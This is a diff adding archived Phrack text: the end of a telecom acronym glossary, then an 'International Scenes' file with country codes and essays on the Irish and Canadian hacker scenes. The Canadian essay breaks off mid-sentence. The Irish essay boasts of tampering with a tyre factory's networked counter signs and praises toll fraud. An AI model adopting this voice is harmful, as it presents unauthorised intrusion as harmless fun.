+TM1          Terminal 1 (IOS)
+TMA          Trunk module analog
+TMAS         Transport maintance and administration systems
+TMC          Timeslot management channel
+TMD          Trunk module digital
+TMDF         Trunk main distributing frame
+TME          Trunk module equipment
+TMMS         Telephone message management system
+TMPS         Trunk maintenanceaposition
+TMR          Transient memory record
+TMRS         Traffic MeasuRment (GTE)
+TMRS         Traffic measurement and recording system
+TMRS         Traffic metering remote system
+TMS          Time mutiplexed switch
+TMS          Time-multiplexed switch
+TMS          Time-multiplexed switching
+TMT          Traffic management.
+TMX          Trunk module with x-interface
+TN           Telephone number
+TN           Tone (C/I channel code: wake up signal)
+TN           Transaction number
+TN01         Trunk diagnostic found trouble - 1AESS trunk network
+TN02         Dial tone delay alarm failure - 1AESS trunk network
+TN04         Trunk diag request from test panel - 1AESS trunk network
+TN05         Trunk test procedural report or denials - 1AESS trunk network
+TN06         Trunk state change - 1AESS trunk network
+TN07         Response to a trunk type and status request - 1AESS trunk network
+TN08         Failed incoming or outgoing call - 1AESS trunk network
+TN09         Network relay failures - 1AESS trunk network
+TN10         Response to trk-list input usually a request from test position
+TN11         Hourly status of trunk undergoing tests - 1AESS trunk network
+TN16         Daily summary of precut trunk groups - 1AESS trunk network
+TNC          Terminal node controller
+TNDS         Total network data system
+TNF          Telephone number format
+TNN          Trunk network number
+TNOP         Total network operation plan
+TNOP         Total network operations plan
+TNPC         Traffic network planning center
+TNS          Telephone number swap
+TO           Toll office
+TOC          Television operating center
+TOC          Transfer order completion
+TOC0         Reports status of less serious overload conditions -
+               1AESS traffic
+TOC0         Serious traffic condition - 1AESS traffic overload
+TOE          Transfer order establishment
+TOF          Mass oe transfer order frame listings
+TOI          Dial transfer order inquiry
+TOL          Transfer order lists
+TOO          Transfer order omissions
+TOP          Task-oriented practices
+TOP          Technical office protocol
+TOPQ         Top of queue (Quasi SDL)
+TOPS         Timesharing operating system
+TOPS         Traffic operator position system
+TOS          Trunk orderf-service (list)
+TOSS/MP      Traffic operator sequence simulator/mult purpose
+TOW          Transfer order withdrawal
+TP           Dacs test port or test position
+TP           Test position
+TP           Tie pair
+TP           Toll point
+TP 52A       SARTS test position 52A
+TPC          TOPS (DMS) position controllers
+TPH          Transport protocol handler
+TPMP         Tnds performance measurement plan
+TPMP         Total network data system performance measurement plan
+TPR          Taper code
+TPU          Tie pair usage report
+TQ           Television grade customized-service code for LATA access
+TQ           Trunk query
+TQA          Trunk group queuing announcements
+TR           Test register
+TR           Toll regions
+TR           Transfer register
+TR           Trunk reservation controls messages.
+TR           Turret or automatic call distributor (ACD) trunk INTER/TRA blocal
+TR01         Translation information - 1AESS
+TRAC         Call tracing
+TRANS        Transmit
+TRB          Periodic trouble status reporting
+TRBL         Unspecified trouble.
+TRBLORG      Origination trouble.
+TRC          Transfer order recent change report
+TRCC         T-carrier restoration and control centers
+TRCO         Trouble reporting control office
+TRE          Transmission equipment
+TREAT        Trouble report evaluation analysis tool
+TREAT        Trouble reporteandsanalysisstool
+TREQF        Transmission equipment failure.
+TRFC15       Fifteen minute traffic report
+TRG          Trouble reference guide
+TRI          Tone ringer          psb652x
+TRI          Transmission equipment assignment inquiry
+TRK          Analog or digital recorded announcement trunks
+TRK          Trunks
+TRKBD        Trunk board.
+TRKCT        Trunk circuit.
+TRM          Two mile optically remote switching module
+TRM          Two-mile remote switching module
+TRMG         Terminal group
+TRMSN        Transmission
+TRMTR        Tramsmitter
+TRMTR        Transmitter
+TRNS         Translations
+TRR          Tip-ring reversal
+TRR          Tip-ring reversal (MDII)
+TRR          Tip-ring reverse
+TRU          Transmit/receive unit
+TRVR         Translation verification
+TRW          Total reservation order withdrawal
+TS           Test number
+TS           Time slot
+TSA          Time slot assignment
+TSC          Test system controller
+TSC          Tristate control
+TSC/RTU      Test systems controller/remote test unit
+TSCPF        Time switch and call processor frame
+TSCPF        Time switch and central processor frame
+TSG          Timing signal generator
+TSI          Time slot interchanger
+TSI          Time slot interchangers
+TSI          Time-slot interchange
+TSIIN        Time-slot interchange interrupt
+TSIU         Time slot interchange Unit
+TSL          Line equipment summary report
+TSMS         Traffic seperation measurment system
+TSN          Test session number
+TSN          Traffic statistics on telephone numbers
+TSO          Time sharing option
+TSORT        Transmission system optimum relief tool
+TSP          Test supervisor
+TSP          Traffic service position
+TSPS         Traffic service position system
+TSS          Trunk servicing system
+TSS          Trunk servicing systems
+TSST         Time-space-space-time network
+TST          Test
+TST          Time-space-time network
+TST          Time-space-time switch (TSI-TMS-TSI)
+TST          Transmission test
+TST          Traveling-wave tube
+TSTS         Time-space-time-space network
+TSV          Test ststus verification (monitor)
+TSW          Total service order withdrawal
+TT           Teletypewriter channel INTER/TRA blocal 1-26
+TT           Trunk type
+TTA          Terminating traffic area
+TTAA         Transmission theory and applacations
+TTC          Terminating toll center
+TTE          Trunk trafic engineering
+TTFCOM       Test transmission facility common
+TTFCOM       Transmission test facility common
+TTL          Transistor-transistor logic
+TTMI         Trunkytransmission maintenance index
+TTP          Trunk test panel
+TTR          Operator trunk trouble reports
+TTR          Operator trunk trouble reports (MDII)
+TTS          Trunk time switch
+TTSI         Transmit time slot interchanger
+TTTN         Tandem tie trunk network
+TTU          Trasnslation Table Update (GTE)
+TTY          Get tty name  - COSMOS command
+TTY          Teletypewriter
+TTYC         Tty controller
+TU           Transmit unit
+TU           Trunk unit
+TU           Turret or automatic call distributor (acd) line INTER/TRA blocal
+TUCHBD       Trunk unit channel board
+TUP          Telephone user part (SS7: q.72x)
+TUR          Traffic usage recording
+TUR          Trunk utilization report
+TUT          Trunk under test
+TV           TV channel one way 15khz audio-service code for LATA access
+TW           TV channel one way 5khz audio-service code for LATA access
+TW           Twist
+TW02         Dump of octal contents of memory - 1AESS translation
+TWX          Teletype writer exchange
+TWX          Teletypewriter exchange
+TX           Dedicated facility INTER/TRA blocal 1-26
+TX           Tone transceivers
+TXC          Text checker
+TXM          Transfer centrex management
+TYP          Switch type
+TYP          Type
+Talkoff      Take off
+Trunk        Trunk
+TxSD         Transmit serial data
+U            Single wire pair
+U(k0)        (ger) u0 echo cancellation interface
+U(p0)        (ger) u0 burst mode interface
+U-           Unnumbered (u-frames)
+U-DSL        U-interface digital subscriber line
+UA           Unnumbered ack (LAP-D response)
+UA           User agent (x.400)
+UAE          User application entity  or  user agent entity (x.400)
+UAF          Unblocking acknowledgment failure
+UAI          U activation indication (C/I channel code)
+UBA          Unblocking acknowledgement
+UBL          Unblocling (SS7: in ISUP)
+UCA          Unauthorized centralized automatic message accountin (MDII)
+UCD          Uniform call distribution
+UCL          Unconditional
+UCONF        Universal conference
+UCS          User control string
+UDC          Universal digital channel
+UDLC         Universal dlc
+UDP          Update dip parameters
+UDP          User datagram protocol
+UDR          User data rate
+UDT          Unidata (SS7: in SCCP)
+UDTS         Unidata servive (SS7: in SCCP)
+UDVM         Universal data voice multiplexer
+UES          Update the entity summary table
+UFD          Microfarad
+UFO          Unprinted frame orders
+UFT          Unitized facility terminals
+UI           Unnumbered information  (LAP-D command)
+UIC          U-interface unit
+UIC          User identification code
+UID          User id
+UINTF        The ANSI standard U interface is down.
+UITP         Universal information transport plan
+ULCU         User level control/command unit
+UMC          Unassigned multiplexer code
+UNDRN        Underrange
+UNISTAR      Universal single call telecommunications answering & repair
+UNKN         Unknown
+UOA          U interface only activation (in EOC)
+UP           User part
+UPC          Update ccs vs. class of service table
+UPDT         Update
+UPS          Uninterruptable power systems
+UQL          Unequipped label received (outgoing)
+US           USOC
+US           Unit separator
+USART        Universal synchrounous/asynchrounous receiver/transmitter
+USB          Upper side band
+USITA        United states independent telephone association
+USL          List USOC (us) file data
+USO          Univeral service order
+USO          Universal service order
+USOC         Universal service order code
+USP          Universal sampling plan
+USR          User-to-user information (SS7: in ISUP)
+UTC          Unable to comply ack (in eoc)
+UTC          Unacknowledged (unnumbered) information transfer control (IOS)
+UTC          Update table for concentrator redesign
+UTD          Universal tone decoder
+UTG          Universal tone generator
+UTM          Universal transaction monitor
+UTS          Umbilical time slot
+UUCICO       Unix to unix copy incoming copy outgoing
+UUCP         Unix to unix copy program
+UUCP         Unix-system to unix-system copy
+UUID         Universal user identification
+UUS          User-to-user signaling (i.257 a)
+UUT          User to user signaling
+UVC          Universal voice channel
+UWAL         Universal wats (wide area telephone service) access line
+UXS          Unexpected stop
+UXS          Unexpected stop (MDII)
+V            Volts
+V(R)         Receive sequence counter
+V(S)         Transmit sequence counter
+VAC          Vacuumschmelze (produces cores and transformers)
+VAL          Minimum valid hours for entity data
+VAN          Value added network
+VANS         Value added network service
+VAP          Value added process
+VAP          Videotext access point
+VAR          Value added retailer
+VC           Virtual call
+VC           Virtual circuit
+VCA          Vacant code
+VCB          Virtual circuit bearer
+VCS          Virtual circuit switch (as in Datakit)
+VCS          Virtual circuit switching
+VCS          Virtual circuit system
+VDC          Unk? (On service order)
+VDT          Video display terminal
+VERS         Version
+VF           Commercial television (full time) INTER/TRA blocal 1-26
+VF           Voice frequency
+VFAC         Verified and forced account codes
+VFD          Verify display
+VFG          Virtual facility group
+VFN          Vendor feature node
+VFS          Verify status
+VFY          Verfy
+VFY          Verify
+VG           Voice grade
+VGB          Voice grade budget
+VGF          Voice grade facility
+VGT          Boltage test
+VGT          Voltage test (SARTS command)
+VH           Commercial television (part time) INTER/TRA blocal 1-26
+VHDL         Very high scale ic description language (DOD)
+VHF          Very high frequency
+VINES        Virtual network software
+VIU          Voiceband interface unit
+VL           (Ger) connecting cable
+VLD          Validity
+VLSI         Very large-scale integrated circuitry
+VLT          Voltage
+VM           Control/remote metering-voice grade INTER/TRA blocal 1-26
+VM/SP        Virtual machine/system product
+VMC          Vender marketing center
+VMCF         Virtual machine communications facility
+VMR          Volt-meter reverse
+VMRS         Voice message relay system
+VMS          Virtual memory operating system
+VMS          Voice mail system
+VMS          Voice management system
+VMS          Voltage Monitor error Summary
+VNF          Virtual network feature
+VNL          Via net loss plan
+VNLF         Via net loss factor
+VO           International overseas television INTER/TRA blocal 1-26
+VODAS        Voice over data access station
+VPA          Voice path assurance timeout (outgoing)
+VPN          Virtual private network
+VR           Non-commercial television
+VRMS         Voltage remote mean square
+VRS          Voice response system
+VSAM         Virtual storage access method
+VSAT         Very small aperature terminal
+VSAT         Very small aperture terminal (for satellite communication)
+VSB          Vestigial sideband modulation
+VSC          Vendor service center
+VSE          Virtual storage extended
+VSP          (ger) full frame storage
+VSR          Voice storage and retrieval
+VSRTP        Voice service remote test port
+VSS          Voice storage system
+VSSP         Voice switch signaling point
+VSt          (ger) exchange unit
+VT           Vertical tabulator
+VT           Virtual terminal
+VTAM         Virtual telecom access method
+VTAM         Virtual telecommunications access method
+VTI          Virtual terminal interface
+VTOC         Volume table of contents
+VTS          Video teleconferencing system
+VUA          Virtual user agent
+W            Date and time this ticket is closed.
+W            With
+WADS         Wide area data service
+WAN          Wide area network
+WATS         Wide area telecommunications service
+WATS         Wide area telephone service
+WB           Wideband digital 19.2 kb/s-service code for LATA access
+WC           Special 800 surface trunk INTER/TRA blocal 1-26
+WC           Wire center
+WCC          Change wire center  - COSMOS command
+WCI          Write controller interface (IOM2 monitor command)
+WCPC         Wire center planning center
+WCT          Worksheet for cable throw orders
+WD           Special wats trunk (out) INTER/TRA blocal 1-26
+WDCS         Wideband digital cross-connect system
+WDFHP        Recursive high pass filter + decimation filter
+WDFLP        Recursive low pass filter + decimation filter
+WDM          Wavelength division multiplex
+WDM          Wavelength division multiplexing
+WDT          Watch dog timer
+WE           Wideband digital 50 kb/s-service code for LATA access
+WEBS         Wells electronic banking system
+WF           Wideband digital 230.4 kb/s-service code for LATA access
+WFA          Work and force administration
+WFA-CMSA     Work and force administration - common module for
+              systems administration
+WFA/DO       Work and force administration/dispatch out
+WFL          Working frame location
+WG           Switch group
+WH           Wideband digital 56 kb/s-service code for LATA access
+WI           800 surface trunk INTER/TRA blocal 1-26
+WI           Wink start
+WIP          Workcenter information package
+WJ           Wideband analog 60-108 khz-service code for LATA access
+WL           Wideband analog 312-552 khz-service code for LATA access
+WM           Work manager
+WN           Wideband analog 10hz-20 khz-service code for LATA access
+WO           Wats line (out) INTER/TRA blocal 1-26
+WOI          Work order inquiry
+WOL          Work order listing
+WORD         Work order and record detail
+WORD         Work order record and details
+WP           Wideband analog 29-44 khz-service code for LATA access
+WPN          Work package number
+WPT          Work package table
+WPT          Work package type
+WR           Wideband analog 564-3064 khz-service code for LATA access
+WS           Wats trunk (out) INTER/TRA blocal 1-26
+WSL          Work status list
+WSO          Wats service office
+WUL          Work unit report for subscriber line
+WX           800 service line INTER/TRA blocal 1-26
+WY           Wats trunk (2-way) INTER/TRA blocal 1-26
+WZ           Wats line (2-way) INTER/TRA blocal 1-26
+X            Check t for trouble
+X-bar        Crossbar
+XA           Dedicated digital 2.4 kb/s-service code for LATA access
+XAD          Transmit adress
+XB           Dedicated digital 4.8 kb/s-service code for LATA access
+XB           X-bar
+XBT          X-bar tandem
+XFE          X-front end
+XFIFO        Transmit fifo
+XG           Dedicated digital 9.6 kb/s-service code for LATA access
+XH           Dedecated digital 56. kb/s-service code for LATA access
+XID          Exchange identification (LAP-D command/response)
+XMS          Extended multiprocessor operating system
+XN           X
+XN           X number
+XOFF         Transmission off (dc1)
+XON          Transmission on  (dc3)
+XPL          Cross reference protocol listing (PCT)
+XST          Expected stop time-out
+XTC          Extended test controller
+XTC          Extended test controllers
+XTC          Extened test controller
+Y            Initials of person to whom ticket is dispatched
+Z            Redispatch information.
+Z            Transmit level point z
+ZA           Alarm circuts INTER/TRA blocal 1-26
+ZC           Call and talk circuts INTER/TRA blocal 1-26
+ZCS          Zero code suppression
+ZCS          Zero code suppression encoding (ds-1)
+ZE           Emergency patching circuts INTER/TRA blocal 1-26
+ZF           Order circuts- facility INTER/TRA blocal 1-26
+ZM           Measurement and recording circuts INTER/TRA blocal 1-26
+ZN           Zone location
+ZP           Test circut- plant service center INTER/TRA blocal 1-26
+ZQ           Quality and management circuts INTER/TRA blocal 1-26
+ZS           Switching- control and transfer circuts INTER/TRA blocal 1-26
+ZT           Test circuts- central office INTER/TRA blocal 1-26
+ZV           Order circuts- service INTER/TRA blocal 1-26
+kHz          Kilohertz-one thoughand hertz
+
+
+----------------------EOF------EOF-------EOF------EOF----------------------
+
+
diff --git a/phrack43/26.txt b/phrack43/26.txt
new file mode 100644
index 0000000..e0c27c7
--- /dev/null
+++ b/phrack43/26.txt
@@ -0,0 +1,1193 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 26 of 27
+
+                              International Scenes
+
+There was once a time when hackers were basically isolated.  It was
+almost unheard of to run into hackers from countries other than the
+United States.  Then in the mid 1980's thanks largely to the
+existence of chat systems accessible through X.25 networks like
+Altger, tchh and QSD, hackers world-wide began to run into each other.
+They began to talk, trade information, and learn from each other.
+Separate and diverse subcultures began to merge into one collective
+scene and has brought us the hacking subculture we know today.  A
+subculture that knows no borders, one whose denizens share the common goal
+of liberating information from its corporate shackles.
+
+With the incredible proliferation of the Internet around the globe, this
+group is growing by leaps and bounds.  With this in mind, we want to help
+further unite the communities in various countries by shedding light
+onto the hacking scenes that exist there.  We have been requesting files
+from people to describe the hacking scene in their country, but
+unfortunately, more people volunteered than followed through (you know
+who you are.)  By next issue we will have more, I'm sure, but for now,
+we want to introduce you all to the scenes in Ireland and Canada.
+
+
+*****************************************************************************
+
+COUNTRIES ON THE INTERNET
+
+AD   Andorra
+AE   United Arab Emirates
+AF   Afghanistan
+AG   Antigua and Barbuda
+AI   Anguilla
+AL   Albania
+AM   Armenia
+AN   Netherland Antilles
+AO   Angola
+AQ   Antarctica
+AR   Argentina
+AS   American Samoa
+AT   Austria
+AU   Australia
+AW   Aruba
+AZ   Azerbaidjan
+BA   Bosnia-Herzegovina
+BB   Barbados
+BD   Bangladesh
+BE   Belgium
+BF   Burkina Faso
+BG   Bulgaria
+BH   Bahrain
+BI   Burundi
+BJ   Benin
+BM   Bermuda
+BN   Brunei Darussalam
+BO   Bolivia
+BR   Brazil
+BS   Bahamas
+BT   Buthan
+BV   Bouvet Island
+BW   Botswana
+BY   Bielorussia
+BZ   Belize
+CA   Canada
+CC   Cocos Island
+CF   Central African Republic
+CG   Congo
+CH   Switzerland
+CI   Ivory Coast
+CK   Cook Islands
+CL   Chile
+CM   Cameroon
+CN   China
+CO   Colombia
+CR   Costa Rica
+CS   Czechoslovakia
+CU   Cuba
+CV   Cape Verde
+CX   Christmas Island
+CY   Cyprus
+DE   Germany
+DJ   Djibouti
+DK   Denmark
+DM   Dominica
+DO   Dominican Republic
+DZ   Algeria
+EC   Ecuador
+EE   Estonia
+EG   Egypt
+EH   Western Sahara
+ES   Spain
+ET   Ethiopia
+FI   Finland
+FJ   Fiji
+FK   Falkland Islands
+FM   Micronesia
+FO   Faroe Islands
+FR   France
+FX   France
+GA   Gabon
+GB   Great Britain (UK)
+GD   Grenada
+GE   Georgia
+GH   Ghana
+GI   Gibraltar
+GL   Greenland
+GP   Guadeloupe
+GQ   Equatorial Guinea
+GF   French Guyana
+GM   Gambia
+GN   Guinea
+GR   Greece
+GT   Guatemala
+GU   Guam
+GW   Guinea Bissau
+GY   Guyana
+HK   Hong Kong
+HM   Heard & McDonald Island
+HN   Honduras
+HR   Croatia
+HT   Haiti
+HU   Hungary
+ID   Indonesia
+IE   Ireland
+IL   Israel
+IN   India
+IO   British Indian Ocean Territories
+IQ   Iraq
+IR   Iran
+IS   Iceland
+IT   Italy
+JM   Jamaica
+JO   Jordan
+JP   Japan
+KE   Kenya
+KG   Kirgistan
+KH   Cambodia
+KI   Kiribati
+KM   Comoros
+KN   St.Kitts Nevis Anguilla
+KP   North Korea
+KR   South Korea
+KW   Kuwait
+KY   Cayman Islands
+KZ   Kazachstan
+LA   Laos
+LB   Lebanon
+LC   Saint Lucia
+LI   Liechtenstein
+LK   Sri Lanka
+LR   Liberia
+LS   Lesotho
+LT   Lithuania
+LU   Luxembourg
+LV   Latvia
+LY   Libya
+MA   Morocco
+MC   Monaco
+MD   Moldavia
+MG   Madagascar
+MH   Marshall Islands
+ML   Mali
+MM   Myanmar
+MN   Mongolia
+MO   Macau
+MP   Northern Mariana Island
+MQ   Martinique
+MR   Mauritania
+MS   Montserrat
+MT   Malta
+MU   Mauritius
+MV   Maldives
+MW   Malawi
+MX   Mexico
+MY   Malaysia
+MZ   Mozambique
+NA   Namibia
+NC   New Caledonia
+NE   Niger
+NF   Norfolk Island
+NG   Nigeria
+NI   Nicaragua
+NL   Netherlands
+NO   Norway
+NP   Nepal
+NR   Nauru
+NT   Neutral Zone
+NU   Niue
+NZ   New Zealand
+OM   Oman
+PA   Panama
+PE   Peru
+PF   Polynesia
+PG   Papua New Guinea
+PH   Philippines
+PK   Pakistan
+PL   Poland
+PM   St. Pierre & Miquelon
+PN   Pitcairn
+PT   Portugal
+PR   Puerto Rico
+PW   Palau
+PY   Paraguay
+QA   Qatar
+RE   Reunion
+RO   Romania
+RU   Russian Federation
+RW   Rwanda
+SA   Saudi Arabia
+SB   Solomon Islands
+SC   Seychelles
+SD   Sudan
+SE   Sweden
+SG   Singapore
+SH   St. Helena
+SI   Slovenia
+SJ   Svalbard & Jan Mayen Islands
+SL   Sierra Leone
+SM   San Marino
+SN   Senegal
+SO   Somalia
+SR   Suriname
+ST   St. Tome and Principe
+SU   Soviet Union
+SV   El Salvador
+SY   Syria
+SZ   Swaziland
+TC   Turks & Caicos Islands
+TD   Chad
+TF   French Southern Territories
+TG   Togo
+TH   Thailand
+TJ   Tadjikistan
+TK   Tokelau
+TM   Turkmenistan
+TN   Tunisia
+TO   Tonga
+TP   East Timor
+TR   Turkey
+TT   Trinidad & Tobago
+TV   Tuvalu
+TW   Taiwan
+TZ   Tanzania
+UA   Ukraine
+UG   Uganda
+UK   United Kingdom
+UM   US Minor Outlying Islands
+US   United States
+UY   Uruguay
+UZ   Uzbekistan
+VA   Vatican City State
+VC   St.Vincent & Grenadines
+VE   Venezuela
+VG   British Virgin Islands
+VI   U.S. Virgin Islands
+VN   Vietnam
+VU   Vanuatu
+WF   Wallis & Futuna Islands
+WS   Samoa
+YE   Yemen
+YU   Yugoslavia
+ZA   South Africa
+ZM   Zambia
+ZR   Zaire
+ZW   Zimbabwe
+
+****************************************************************************
+
+                           HACKING IN IRELAND
+                                   BY
+                                HAWKWIND
+
+ Greetings from the Emerald Isle!  My name is Hawkwind, and I'm an
+Irish hacker *evil cackle*.  So, what's the hacking scene like in this
+small green island called Ireland, perched on the edge of the Atlantic
+Ocean?  -an island which claims to have one of the most sophisticated
+digital phone networks in Europe, home of Eirpac (the Irish equivalent to
+Sprintnet/Telenet) and lots of other weird and wonderful things like
+that.
+
+ Well, the hacking scene, like the country itself, is small
+-there are no elite in Ireland. -or if there are they are so elite that
+nobody has heard of them.  So if you're only into elite stuff, then
+don't bother reading on, skip onto the next country.
+
+ Also, sadly at the moment, there seems to be little interest in
+hacking in Ireland  -I can count the number of Irish hackers I know on
+the fingers of one hand.  Maybe I'm just hanging out in the wrong places,
+or perhaps its the Iron Hand of Ireland's own Little Brother, friend and
+follower of the U.S's Big Brother, enforcing his evil ways of censorship
+and the like upon us all, denying us the right to free information.
+Nationwide censorship of Usenet hurts like dry ice, but restricting ftp
+and telnet out of the country to the privileged few, is the fatal
+crunch.  Now, I ask you, with grief like this, is it any wonder so few
+Irish have made it into the Computer Underground  -to those that have
+beaten the odds, I wish them well.
+
+ OK, so what do Irish hackers like to hack?  Like many hackers we
+just have the curiosity and desire to explore any system or network we
+come across  -the everlasting search for that spine-tingling adrenaline
+rush when you've beaten the system and got somewhere where perhaps no
+commoner has gone before  -don't ever ask us to choose between getting
+well drunk, having sex, or hacking  --it would be a rough choice.
+
+ Let me start by telling you of what I find an interesting moment
+in Irish hacking history. -to you it may just seem like no big deal, but
+we kinda like it.
+ There is a type manufacturing company in Dublin, Ireland and
+they like to make tyres--in order not to ruin any reputations we won't
+mention any names--just another tyre company.  Now this company likes
+nice modern systems--big colorful display panels with lots of flashing
+lights, to keep their managers happy and amused for hours.  A happy
+company is lots of happy striving workers and so, a big flashy sign
+which displayed the number of tyres being produced, and dutifully
+counted upwards every time one come off the assembly line, was
+constructed.  So they had a big sign inside the plant so the workers
+could see how hard they were working, and big bonuses and lots of
+presents were promised if they got past a certain number in a day.
+There was also a large juicy sign outside the plant showing this number
+so that the general public could be suitably impressed with the busy-bee
+workers and the number of tyres being produced.
+
+ And all these signs and computers controlling them were
+connected to such mysteries as a network with a couple of black boxes
+which management proudly called modems  -enter stage left, Irish
+hackers, *deep bow and evil wave*
+
+ So you can imagine, one warm sunny summer's evening, when there
+was really nothing better to do in Dublin, strange things started to
+happen at the tyre factory.  Yes, strange things indeed.  Suddenly the
+workers got very lazy and started slowing down their production,
+becoming slower and slower and slower.  The numbers stopped counting up
+on the glowing sign.  Then the digits oddly started counting backwards.
+Down they went, getting faster and faster  -people began to picture
+enraged workers destroying tyres in a crazed frenzy.  Soon our sign
+showed that there were no tyres left and it began to dive into negative
+numbers of tyres.  The passers-by scratched their heads in astonishment.
+
+ Ah, but enough fun  -this really was a very good tyre company
+with very hard-working workers.  They deserve lots of bonuses  -heck,
+didn't someone say this was the most productive factory in Europe?  Well
+it was that day anyway! *evil cackle*  So the signs stopped counting
+backwards, and suddenly began to race forwards like there was no
+tomorrow.  The workers were scurrying back and forth at lightening speed
+-one hundred, two hundred..a thousand...ten thousand...what, a hundred
+thousand!  Soon our good workers had produced more tyres in the space of
+20 minutes, than visitors Disneyland had in 25 years...
+
+ Ah yes, these are the things that Irish hackers like to do -we
+still wonder if the management gave all those good workers their
+bonuses??
+
+ So really, we like to investigate or hack anything that we might
+stumble across  -anything from the local University library computer to
+tyre companies to networks in lands far away.  One of the things we
+really like doing is just exploring, hopping from one network to the
+next, using computers in such awed places as the U.S., Canada or Mexico,
+this is probably because for us, even to reach such computers and
+networks is an achievement, that our Little Brother would deny us had he
+his evil ways.  We think that the Internet is one of the greatest
+creations in a long time, and we would never want to do any malicious
+damage on such a free association  -if only our Little Brother would let
+us associate freely with it, instead of making life just that little bit
+more difficult.  We find Sprintnet and other connected goodies
+interesting prowling grounds, although we are the first to admit that we
+still have very much to learn here.  To explore these systems is very
+interesting for us, because they are so far away and in such interesting
+lands that we may never see ourselves  -what to you might be the old U.S.,
+to explore the nets there gives us a sense of excitement and a variety
+of systems that cannot be found on such a small island as our own
+Ireland.
+
+    And of course, there is the never-ending quest for U.S. outdials
+in the hope that one day we might actually reach some of the fabled U.S.
+h/p boards and actually meet a real Fed or two.  *snicker*  Turning from
+the strictly hacking scene for the moment there are some Irish people
+interested in the phones and other phun things  -a while back two
+college guys were busted for cracking an eleven digit code on some new
+phone system chip or something, which had given them unlimited dialling
+access and other phun privileges.  -then there was the magic toll free
+number which for a month or two gave the Irish population unlimited
+access to the outside world (a big thank-you goes to whoever worked that
+one out. *grin*)  I'm told from reliable sources that we have a pretty
+sophisticated phone system, a matter we soon hope to be investigating,
+but this does not seem to have stopped phreakers from trying, and if we
+manage to work anything out, we'll, as our 'Telecom Eireann' so aptly
+put it 'Keep in touch across the world'.
+
+ Sadly, we are plagued by outrageous phone charges, even for
+local calls and hence many Irish boards have failed to blossom  -of
+those that do, the sysops seem to be little interested in h/p talk and I
+know of no dedicated h/p Irish board.
+
+ There also used to be a type of Underground meeting that occurred
+every dark rainy Sunday afternoon, down in the Ormond, a hotel in Dublin
+city centre.  It passed unheeded under the guise of a computer club, but
+the bloke who ran it was a renowned con-man, and dealer of everything
+and anything from car radios to Rolex watches  -in any event the club
+must have been one of the biggest WareZ swapping centres, including all
+the latest videos from the U.S. which would not be released in the
+cinemas(movies) here until six months later.  Generally people
+interested in the same computer type things just got together to chat
+and swap the latest news, disks and videos  -an interesting place with
+interesting folks, which sadly no longer seems to happen.  Perhaps
+someone will revive something similar in the near future.
+
+ Well, I'll end the tale there for the moment.  Hopefully you've
+gotten a little flavor of our little Underground, watched over by our
+Little Brother, in our little country called Ireland.  I'm not sure how
+I ended up writing this article, but since nobody else stepped forward, I
+thought Ireland should at least get some kind of mention, if nothing
+else  -so you can /dev/null any flames.
+
+ Before I sign off, I'd just like to thank Phrack not only for
+giving me the chance to tell my tale, but for supplying us with a great
+publication and guide to the Underground.  Finally, if you are an Irish
+hacker/phreaker, then get in touch now!!!  -I really want to be able to say
+that I can count the number of Irish hackers I know on two hands, and not
+just one, before the end of the decade!  Also, I am always interested in
+talking to anyone interested in the hack/phreak world so get in touch if
+you want to chat  -just remember, we are no elite!
+(I don't suppose anyone out there, knows anything about the Irish phone
+system? *shrugs*)
+
+Ok, I can be reached at the following, for the next little while:
+(Yes, I do have Irish a/c's but not for thine eyes...)
+
+ al575@yfn.ysu.edu
+ hawkwind@m-net.ann-arbor.mi.us
+ hawkwin@santafe.edu  (note: no 'd' at end userid)
+
+
+I'm also sometimes on IRC, and may hopefully be on phantom soon.
+Well, as we say in Ireland, good luck and may the road rise up before
+you.
+
+Slan Leat,
+Hawkwind.
+
+*****************************************************************************
+
+
+                           Canada
+              All is Quiet on the Northern Front
+
+                Written and compiled by Synapse
+
+Welcome to the barren wastes or rather the undeveloped wastes if
+you will. Welcome to Canada. A realm seldom traveled and less
+often explored. Canada, or .ca if you will, is virgin country in
+the net. There are places that have been sitting idle for years
+on our nets that still have default accounts in use. There is an
+unmeasurable amount of data out there waiting to be tapped. The
+possibilities in this are endless, Canada is untouched for the
+most part, and as developed networks go, I feel that Canada is as
+close to The 'Undiscovered country' as you can get.
+
+Most likely if you are reading this article you will be of a
+nationality other than Canadian. If so, perhaps this will be an
+educational experience for you. To explain our nets and our scene
+here in the far far north, I must first explain our nation and
+its greatest difficulty, it has NO identity, therefore it tends
+to mirror those it is enamored with.  Hence our scene resembles
+an amalgamation of whatever seems popular in the nets at a given
+time. Most often it attempts somewhat miserably to emulate the
+scene south of our border, the great U S of A. And in short it
+fails miserably.
+
+This is not to say that Canada does not have a scene of its own
+nor is it attempting to take away from those scenes that have
+developed fully on their own within .ca. It is simply bringing to
+light a problem that plagues our scene and dilutes it for those
+who are serious about the computer underground, and whatever
+ideals it may contain.
+
+If you travel the nets in Canada you will find that dissent and
+"ElYtEeGoStRoKInG" are staple with both the Hacking and Warez
+scenes all throughout the nine provinces and 2 territories. As I
+am sure you know this is not a problem unique to .ca. However in
+a scene as minute and spread painfully thin as ours, arrogance
+and mis-communication can be fatal in the way of cooperation
+gaps. This has proved the case many times in the recent past, and
+I am sure it will in the near future as well.
+
+Canada seems to a have a communication barrier that separates
+east from west. There is simply close to no communications
+between the two. It is as if we are in separate hemispheres and
+lost to the technology of fibber optics and damned to smoke
+signals and drum beating. I have to wonder sometimes if both
+sides are so involved in their own local power struggles, that
+the rest of the world has melted away including their country men
+on either side.
+
+Alas it is time to dive into this the this of the article. To
+detail the complete underground in Canada would be impossible for
+me to do, to even give a non-biased view would be impossible. So
+if you feel that this is simply an overextended opinion, thank
+IBM for the PgDn key and spare yourself some opinionated text.
+
+                    The Almost LODs of .ca
+
+Just like the U.S., Canada is proliferated with umpteen amounts
+of upstart groups who after reading some trashy second rate book
+on LOD or Kevin Mitnick, have decided that they have found what
+it is to be elyte. Most often these will be the prominent voices
+on underground boards spitting flame and stroking immeasurably
+unhealthy egos, and boasting how proficient they are with toneloc
+and Killer Cracker. However as with most boasts put forth by
+fourteen year olds, nothing comes of it.
+
+However if you can manage passage through the quagmire of shit
+that serves as the .ca scene, then you will most likely encounter
+some of .ca's more serious minded types who while retaining
+talent and a penchant for learning, do not sport an ego of
+astronomical proportions, and wit that would bring condescension
+from an ant. The following is a short list of several of .ca's
+more prominent if not more talented groups.
+
+                   RaBID The Virus People
+
+If the Virus world is your environment, then most likely you
+have stumbled across the work of RaBID, hopefully not on the
